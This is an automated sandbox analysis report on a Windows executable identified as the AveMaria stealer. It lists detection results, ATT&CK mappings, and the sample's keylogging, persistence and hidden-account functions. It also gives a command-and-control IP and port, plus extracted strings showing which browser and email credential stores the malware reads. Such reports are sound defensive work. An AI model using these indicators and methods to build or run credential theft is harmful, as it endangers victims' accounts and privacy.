
Analysis Report 4ifN8B061M

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 1014791
Start date: 09.12.2019
Start time: 09:30:46
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 7m 31s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 4ifN8B061M (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@4/2@0/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 31.8% (good quality ratio 31.4%)
  • Quality average: 90.2%
  • Quality standard deviation: 19.1%
HCA Information:
  • Successful, ratio: 80%
  • Number of executed functions: 97
  • Number of non-executed functions: 246
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, mscorsvw.exe
  • Excluded IPs from analysis (whitelisted): 2.20.142.254, 2.20.142.202, 205.185.216.10, 205.185.216.42
  • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, a1363.dscg.akamai.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, crl.microsoft.com, crl.www.ms.akadns.net

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Reporting: Report FP / FN
Whitelisted: false
Threat: AveMaria
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

  • Contains functionality to modify the execution of threads in other processes
  • Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Impact | Post-Adversary Device Access | Without Adversary Device Access
Valid Accounts | Execution through API2 | Registry Run Keys / Startup Folder1 | Access Token Manipulation1 | Hidden Users1 | Credential Dumping2 | System Time Discovery1 | Remote File Copy21 | Input Capture21 | Data Encrypted1 | Commonly Used Port1 | Endpoint Denial of Service1 | |
Replication Through Removable Media | Service Execution2 | Hidden Files and Directories1 | Process Injection112 | Software Packing1 | Credentials in Files1 | Security Software Discovery2 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Uncommonly Used Port1 | Data Encrypted for Impact | |
External Remote Services | Windows Management Instrumentation | Create Account1 | New Service1 | Deobfuscate/Decode Files or Information1 | Input Capture21 | System Service Discovery1 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Remote File Copy21 | Disk Structure Wipe | |
Drive-by Compromise | Scheduled Task | Modify Existing Service1 | DLL Search Order Hijacking | Obfuscated Files or Information2 | Credentials in Files | File and Directory Discovery2 | Logon Scripts | Input Capture | Data Encrypted | Standard Cryptographic Protocol2 | Disk Content Wipe | |
Exploit Public-Facing Application | Command-Line Interface | New Service1 | File System Permissions Weakness | Masquerading3 | Account Manipulation | System Information Discovery12 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol | Service Stop | |
Spearphishing Link | Graphical User Interface | Modify Existing Service | New Service | Hidden Files and Directories1 | Brute Force | Process Discovery2 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Inhibit System Recovery | |
Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Virtualization/Sandbox Evasion2 | Two-Factor Authentication Interception | Network Sniffing | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Defacement | |
Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | Access Token Manipulation1 | Bash History | Network Service Scanning | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Stored Data Manipulation | |
Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Process Injection112 | Input Prompt | System Network Connections Discovery | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Transmitted Data Manipulation | |

Signature Overview



AV Detection:

Antivirus detection for dropped file
Source: C:\ProgramData\images.exe | Avira: detection malicious, Label: TR/Crypt.Agent.yyhho
Antivirus detection for sample
Source: 4ifN8B061M.exe | Avira: detection malicious, Label: TR/Crypt.Agent.yyhho
Multi AV Scanner detection for submitted file
Source: 4ifN8B061M.exe | Virustotal: Detection: 47%
Yara detected AveMaria stealer
Source: Yara match | File source: 00000003.00000003.566547321.0012A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.422033804.003DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.422009641.003DA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.567782220.0012C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.564800575.00130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.421973490.003CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: images.exe PID: 3596, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4ifN8B061M.exe PID: 3380, type: MEMORY
Source: Yara match | File source: 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.images.exe.430000.1.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\ProgramData\images.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 4ifN8B061M.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.images.exe.430000.1.unpack | Avira: Label: TR/RedCap.ghjpt
Source: 0.2.4ifN8B061M.exe.250000.1.unpack | Avira: Label: TR/RedCap.ghjpt

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_00259E04 lstrlenA,CryptStringToBinaryA,lstrcpyA
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_002592D8 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025AFDF PathFileExistsW,CopyFileW,CryptUnprotectData,LocalFree
Source: C:\ProgramData\images.exe | Code function: 3_2_00439E04 lstrlenA,CryptStringToBinaryA,lstrcpyA
Source: C:\ProgramData\images.exe | Code function: 3_2_004392D8 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW
Source: C:\ProgramData\images.exe | Code function: 3_2_0043AFDF PathFileExistsW,CopyFileW,CryptUnprotectData,LocalFree

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_012E879D FindFirstFileExA
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_00258A9C GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025DEC5 FindFirstFileW,FindNextFileW
Source: C:\ProgramData\images.exe | Code function: 3_2_00CC879D FindFirstFileExA
Source: C:\ProgramData\images.exe | Code function: 3_2_0043DEC5 FindFirstFileW,FindNextFileW
Source: C:\ProgramData\images.exe | Code function: 3_2_00438A9C GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA
Contains functionality to query local drives
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025DFC9 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW

Networking:

Detected non-DNS traffic on DNS port
Source: global traffic | TCP traffic: 192.168.1.16:49172 -> 8.8.8.8:53
Source: global traffic | TCP traffic: 192.168.1.16:49170 -> 8.8.8.8:53
Source: global traffic | TCP traffic: 192.168.1.16:49169 -> 8.8.8.8:53
Contains functionality to download and execute PE files
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_00252675 URLDownloadToFileW,ShellExecuteW
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.1.16:49171 -> 45.133.183.138:5200
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 45.133.183.138
Source: unknown | TCP traffic detected without corresponding DNS query: 45.133.183.138
Contains functionality to download additional files from the internet
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025B424 recv
Urls found in memory or binary data
Source: 4ifN8B061M.exe | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: 4ifN8B061M.exe | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 4ifN8B061M.exe | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: 4ifN8B061M.exe | String found in binary or memory: http://ocsp.sectigo.com0
Source: 4ifN8B061M.exe | String found in binary or memory: http://ocsp.thawte.com0
Source: 4ifN8B061M.exe | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 4ifN8B061M.exe | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 4ifN8B061M.exe | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 4ifN8B061M.exe, images.exe | String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
Source: 4ifN8B061M.exe, 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, images.exe, 00000003.00000003.566547321.0012A000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: 4ifN8B061M.exe | String found in binary or memory: https://sectigo.com/CPS0C

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025765A GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx
Installs a raw input device (often for capturing keystrokes)
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_00257CB3 DefWindowProcA,GetRawInputData,GetRawInputData,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrcpyW,CreateFileW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,CloseHandle,PostQuitMessage,RegisterRawInputDevices

E-Banking Fraud:

Yara detected AveMaria stealer
Source: Yara match | the same 14 memory dump, process memory and unpacked PE sources listed under AV Detection above

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware, Author: Florian Roth
Source: 3.2.images.exe.430000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware, Author: Florian Roth
Source: 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone, Author: unknown
Source: 3.2.images.exe.430000.1.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone, Author: unknown
Detected potential crypto function
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code functions: 0_2_012F7A20, 0_2_012F6AA6, 0_2_012F85EF, 0_2_012E3DFC, 0_2_012FD860, 0_2_012EB840, 0_2_012EBCE2, 0_2_012EE793, 0_2_012EFA19, 0_2_012EE666, 0_2_0025F9F3, 0_2_002492E7, 0_2_0023F332, 0_2_0024931C
Source: C:\ProgramData\images.exe | Code functions: 3_2_00CD6AA6, 3_2_00CD7A20, 3_2_00CCBCE2, 3_2_00CCB840, 3_2_00CDD860, 3_2_00CD85EF, 3_2_00CC3DFC, 3_2_00CCE666, 3_2_00CCFA19, 3_2_00CCE793, 3_2_0043F9F3, 3_2_004292E7, 3_2_0042931C, 3_2_0041F332
Found potential string decryption / allocating functions
Source: C:\ProgramData\images.exe | Code function: String function: 00CC1040 appears 117 times
Source: C:\ProgramData\images.exe | Code function: String function: 00433412 appears 37 times
Source: C:\ProgramData\images.exe | Code function: String function: 0043E907 appears 48 times
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: String function: 012E1040 appears 117 times
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: String function: 0025E907 appears 48 times
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: String function: 00253412 appears 37 times
Sample file is different than original file name gathered from version info
Source: 4ifN8B061M.exe, 00000000.00000002.424017777.000E0000.00000008.00000001.sdmp | Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs 4ifN8B061M.exe
Yara signature match
Matched rule: Codoso_Gh0st_1 (date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841)
Matched rule: Codoso_Gh0st_1_RID2C2D (date = 2016-01-30 09:38:01, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7)
Both of the rules above matched in each of these sources:
  • 00000003.00000003.565700412.0013A000.00000004.00000001.sdmp, type: MEMORY
  • 00000003.00000002.577725352.00448000.00000002.00000001.sdmp, type: MEMORY
  • 00000000.00000002.424138873.00268000.00000002.00000001.sdmp, type: MEMORY
  • 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, type: MEMORY
  • 00000003.00000003.567703677.0013A000.00000004.00000001.sdmp, type: MEMORY
  • 00000000.00000003.422033804.003DD000.00000004.00000001.sdmp, type: MEMORY
  • 00000000.00000003.422009641.003DA000.00000004.00000001.sdmp, type: MEMORY
  • 00000003.00000003.564800575.00130000.00000004.00000001.sdmp, type: MEMORY
  • 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, type: MEMORY
  • 00000000.00000003.421973490.003CD000.00000004.00000001.sdmp, type: MEMORY
  • 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPE
  • 3.2.images.exe.430000.1.unpack, type: UNPACKEDPE
Matched rule: Codoso_Gh0st_2 (date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841)
Matched rule: Codoso_Gh0st_2_RID2C2E (date = 2016-01-30 09:38:11, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7)
Matched rule: AveMaria_WarZone (Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda)
The three rules above matched in each of these sources:
  • 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPE
  • 3.2.images.exe.430000.1.unpack, type: UNPACKEDPE
Classification label
Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@4/2@0/1
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025D609 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
Source: C:\ProgramData\images.exe | Code function: 3_2_0043D609 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
Contains functionality to enum processes or threads
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025EC17 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
Contains functionality to instantiate COM classes
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_002606D5 CoInitialize,CoCreateInstance,VariantInit,CoUninitialize
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025F843 GetModuleFileNameW,IsUserAnAdmin,FindResourceW,LoadResource,SizeofResource,LockResource
Contains functionality to modify services (start/stop/modify)
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025B81D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Creates files inside the program directory
Source: C:\Users\user\Desktop\4ifN8B061M.exe | File created: C:\Program Files\Microsoft DN1
Creates files inside the user directory
Source: C:\Users\user\Desktop\4ifN8B061M.exe | File created: C:\Users\user\AppData\Local\Microsoft Vision\
PE file has an executable .text section and no other executable section
Source: 4ifN8B061M.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads software policies
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: 4ifN8B061M.exe | Virustotal: Detection: 47%
Sample reads its own file content
Source: C:\Users\user\Desktop\4ifN8B061M.exe | File read: C:\Users\user\Desktop\4ifN8B061M.exe
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\4ifN8B061M.exe 'C:\Users\user\Desktop\4ifN8B061M.exe'
Source: unknown | Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: unknown | Process created: C:\ProgramData\images.exe 'C:\ProgramData\images.exe'
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32
Creates a directory in C:\Program FilesShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
PE / OLE file has a valid certificateShow sources
Source: 4ifN8B061M.exeStatic PE information: certificate valid
PE file contains a mix of data directories often seen in goodwareShow sources
Source: 4ifN8B061M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 4ifN8B061M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 4ifN8B061M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 4ifN8B061M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 4ifN8B061M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 4ifN8B061M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: 4ifN8B061M.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directoryShow sources
Source: 4ifN8B061M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
PE file contains a valid data directory to section mappingShow sources
Source: 4ifN8B061M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 4ifN8B061M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 4ifN8B061M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 4ifN8B061M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 4ifN8B061M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025582B LoadLibraryA,GetProcAddress,ExitProcess | 0_2_0025582B
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_012E1AA6 push ecx; ret | 0_2_012E1AB9
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_00251130 push eax; ret | 0_2_00251144
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_00251130 push eax; ret | 0_2_0025116C
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0024311B push ebx; iretd | 0_2_0024311C
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_002419C0 push ebp; retf | 0_2_00241A63
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_00230A6F push eax; ret | 0_2_00230A83
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_00230A6F push eax; ret | 0_2_00230AAB
Source: C:\ProgramData\images.exe | Code function: 3_2_00CC1AA6 push ecx; ret | 3_2_00CC1AB9
Source: C:\ProgramData\images.exe | Code function: 3_2_00431130 push eax; ret | 3_2_00431144
Source: C:\ProgramData\images.exe | Code function: 3_2_00431130 push eax; ret | 3_2_0043116C
Source: C:\ProgramData\images.exe | Code function: 3_2_0042311B push ebx; iretd | 3_2_0042311C
Source: C:\ProgramData\images.exe | Code function: 3_2_004219C0 push ebp; retf | 3_2_00421A63
Source: C:\ProgramData\images.exe | Code function: 3_2_00410A6F push eax; ret | 3_2_00410A83
Source: C:\ProgramData\images.exe | Code function: 3_2_00410A6F push eax; ret | 3_2_00410AAB

Persistence and Installation Behavior:

Contains functionality to create new users
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025B799 NetUserAdd,NetLocalGroupAddMembers | 0_2_0025B799
Contains functionality to download and launch executables
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_00252675 URLDownloadToFileW,ShellExecuteW | 0_2_00252675
Drops PE files
Source: C:\Users\user\Desktop\4ifN8B061M.exe | File created: C:\ProgramData\images.exe
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\4ifN8B061M.exe | File created: C:\ProgramData\images.exe
Contains functionality to read ini properties file for application configuration
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_002598B0 lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW | 0_2_002598B0
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025936E GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW | 0_2_0025936E
Source: C:\ProgramData\images.exe | Code function: 3_2_004398B0 lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW | 3_2_004398B0
Source: C:\ProgramData\images.exe | Code function: 3_2_0043936E GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW | 3_2_0043936E

Boot Survival:

Contains functionality to start windows services
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025B889 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 0_2_0025B889
Creates an autostart registry key
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Images
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Images

Hooking and other Techniques for Hiding and Protection:

Contains functionality to hide user accounts
Source: 4ifN8B061M.exe | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: 4ifN8B061M.exe, 00000000.00000002.424063177.00230000.00000040.00000001.sdmp | String found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A66
Source: images.exe | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: images.exe, 00000003.00000003.566547321.0012A000.00000004.00000001.sdmp | String found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A66
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\4ifN8B061M.exe | File opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | delete
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to enumerate running services
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW | 0_2_0025BDDC
Source: C:\ProgramData\images.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW | 3_2_0043BDDC
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Thread delayed: delay time: 1000000
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Thread delayed: delay time: 1000000
Source: C:\ProgramData\images.exe | Thread delayed: delay time: 1000000
Source: C:\ProgramData\images.exe | Thread delayed: delay time: 1000000
Found evasive API chain checking for process token information
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_0-27633
Source: C:\ProgramData\images.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_3-27511
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\4ifN8B061M.exe TID: 3432 | Thread sleep time: -4000000s >= -30000s
